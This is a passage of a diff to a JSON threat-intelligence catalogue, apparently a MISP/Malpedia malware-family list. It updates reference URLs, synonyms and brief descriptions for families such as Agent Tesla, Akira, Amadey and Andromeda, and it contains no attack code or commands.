"https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf",
- "https://www.telsy.com/download/4832/",
- "https://youtu.be/QQuRp7Qiuzg",
- "https://asec.ahnlab.com/ko/29133/",
- "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
- "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://malwatch.github.io/posts/agent-tesla-malware-analysis/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware",
"https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
- "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
"https://isc.sans.edu/diary/27088",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
- "https://community.riskiq.com/article/40000d46",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware",
- "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/",
- "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html",
+ "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/",
+ "https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/",
+ "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/",
+ "https://unit42.paloaltonetworks.com/originlogger/",
+ "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
"https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ",
- "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://youtu.be/BM38OshcozE",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla",
+ "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/",
"https://guillaumeorlando.github.io/GorgonInfectionchain",
- "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://isc.sans.edu/diary/28202",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/",
+ "https://isc.sans.edu/diary/27666",
+ "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
+ "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://malwatch.github.io/posts/agent-tesla-malware-analysis/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://blog.minerva-labs.com/preventing-agenttesla",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://cert.gov.ua/article/861292",
+ "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/"
],
"synonyms": [
"AgenTesla",
@@ -11714,15 +12408,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f8cd62cb-b9d3-4352-8f46-0961cfde104c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380",
"value": "Agent Tesla"
},
@@ -11752,14 +12437,27 @@
"uuid": "549b23b1-6f53-494e-a302-1d00aa71043b",
"value": "Ahtapot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira",
+ "https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "834635f7-fb0f-472c-913e-fb112ae29fdc",
+ "value": "Akira"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas",
- "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
"https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas",
"https://blog.group-ib.com/task"
],
"synonyms": [
@@ -11801,10 +12499,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/",
- "https://www.symantec.com/security-center/writeup/2016-122104-0203-99",
"https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html"
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/",
+ "https://www.symantec.com/security-center/writeup/2016-122104-0203-99"
],
"synonyms": [
"AliceATM",
@@ -11820,14 +12518,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos",
- "http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/",
+ "http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
"https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/"
],
"synonyms": [
"alina_eagle",
@@ -11844,15 +12542,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore",
+ "https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
+ "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://twitter.com/_re_fox/status/1212070711206064131",
"https://github.com/Anderson-D/AllaKore",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://www.team-cymru.com/post/allakore-d-the-sidecopy-train",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
- "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
- "https://blog.talosintelligence.com/2021/07/sidecopy.html"
+ "https://blog.talosintelligence.com/2021/07/sidecopy.html",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479"
],
"synonyms": [],
"type": []
@@ -11876,6 +12576,20 @@
"uuid": "6aabb492-e282-40fb-a840-fe4e643ec094",
"value": "Allaple"
},
+ {
+ "description": "Allcome is classified as a clipper malware. Clippers are threats designed to access information saved in the clipboard (the temporary buffer space where copied data is stored) and substitute it with another. This attack is targeted at users who are active in the cryptocurrency sector mainly.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allcomeclipper",
+ "https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums",
+ "https://bazaar.abuse.ch/browse/signature/AllcomeClipper/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "43ca1245-a5e0-4b44-9892-cf317170c7b8",
+ "value": "AllcomeClipper"
+ },
{
"description": "",
"meta": {
@@ -11900,15 +12614,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "45de0d28-5a20-4190-ae21-68067e36e316",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a0881a0c-e677-495b-b475-290af09bb716",
"value": "Alma Communicator"
},
@@ -11951,7 +12656,7 @@
"value": "ALPC Local PrivEsc"
},
{
- "description": "",
+ "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware",
@@ -11981,8 +12686,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc",
- "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
],
"synonyms": [],
"type": []
@@ -12008,13 +12713,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon",
- "https://archive.f-secure.com/weblog/archives/The_Case_of__TDL3.pdf",
"http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt",
"http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt",
+ "https://archive.f-secure.com/weblog/archives/The_Case_of__TDL3.pdf",
+ "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/",
"http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html",
"https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/",
"https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/"
],
"synonyms": [
@@ -12030,31 +12735,42 @@
"value": "Alureon"
},
{
- "description": "Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called \"tasks\") for all or specifically targeted computers compromised by the malware.",
+ "description": "Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called \"tasks\") for all or specifically targeted computers compromised by the malware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey",
- "https://twitter.com/0xffff0800/status/1062948406266642432",
- "https://www.anquanke.com/post/id/230116",
- "https://nao-sec.org/2019/04/Analyzing-amadey.html",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://twitter.com/ViriBack/status/1062405363457118210",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/",
- "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
- "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/",
- "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer",
"https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://isc.sans.edu/diary/27264",
- "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer"
+ "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://twitter.com/0xffff0800/status/1062948406266642432",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://www.anquanke.com/post/id/230116",
+ "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://thecyberexpress.com/amadey-botnet-back-via-phishing-sites/",
+ "https://twitter.com/ViriBack/status/1062405363457118210",
+ "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/",
+ "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://nao-sec.org/2019/04/Analyzing-amadey.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://asec.ahnlab.com/en/36634/",
+ "https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://asec.ahnlab.com/en/44504/"
],
"synonyms": [],
"type": []
@@ -12067,8 +12783,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol",
- "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf",
- "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/"
+ "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/",
+ "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf"
],
"synonyms": [
"Adupihan"
@@ -12083,8 +12799,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom",
- "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/",
+ "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/"
],
"synonyms": [],
"type": []
@@ -12097,24 +12813,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor",
- "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://isc.sans.edu/diary/27308",
- "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns",
"https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware",
- "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
- "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/",
- "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns",
- "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/",
- "https://www.netscout.com/blog/asert/dropping-anchor",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://isc.sans.edu/diary/27308",
+ "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
+ "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/"
+ "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/",
+ "https://www.netscout.com/blog/asert/dropping-anchor",
+ "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns",
+ "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/"
],
"synonyms": [],
"type": []
@@ -12127,10 +12845,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormail",
- "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/",
- "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/",
"https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/"
+ "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/",
+ "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
+ "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/"
],
"synonyms": [],
"type": []
@@ -12138,30 +12856,46 @@
"uuid": "7792096a-7623-43a1-9a67-28dce0e4b39e",
"value": "AnchorMail"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor",
+ "https://asec.ahnlab.com/ko/47751/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "59a2437b-ae63-466a-9172-60d6610c3e19",
+ "value": "Andardoor"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda",
- "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
- "https://blog.avast.com/andromeda-under-the-microscope",
- "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
- "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
- "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
- "http://resources.infosecinstitute.com/andromeda-bot-analysis/",
- "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/",
- "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html",
- "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/",
- "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
"https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/",
+ "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "http://resources.infosecinstitute.com/andromeda-bot-analysis/",
+ "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
+ "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity",
+ "https://blog.avast.com/andromeda-under-the-microscope",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
"http://blog.morphisec.com/andromeda-tactics-analyzed",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
+ "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
+ "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
+ "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
+ "https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
+ "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/"
],
"synonyms": [
"B106-Gamarue",
@@ -12179,15 +12913,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
"https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
